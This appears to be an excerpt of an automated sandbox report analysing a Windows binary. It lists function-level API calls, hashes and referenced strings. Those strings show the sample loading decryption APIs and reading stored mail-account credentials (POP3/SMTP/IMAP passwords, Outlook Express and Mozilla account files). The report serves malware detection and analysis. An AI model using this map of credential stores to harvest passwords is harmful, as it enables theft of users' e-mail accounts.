                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3831604043-0
                                                                                                                                                                • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                • String ID: Arial
                                                                                                                                                                • API String ID: 3853255127-493054409
                                                                                                                                                                • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                                                                • String ID: /stext
                                                                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                                                                • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 145871493-0
                                                                                                                                                                • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4165544737-0
                                                                                                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Open
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                • API String ID: 2238633743-192783356
                                                                                                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                                                                • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strcmpi$strlen$_strncoll$atoimemcpy$memset
                                                                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                • API String ID: 750245531-2206097438
                                                                                                                                                                • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                • API String ID: 1714764973-479759155
                                                                                                                                                                • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040ED59
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040ED6F
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040ED85
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040ED9B
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040EDB1
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040EDC7
                                                                                                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                • API String ID: 3137614212-1455797042
                                                                                                                                                                • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E634
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E64A
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E660
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E676
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E68C
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040E69F
                                                                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                • sprintf.MSVCRT ref: 0040E788
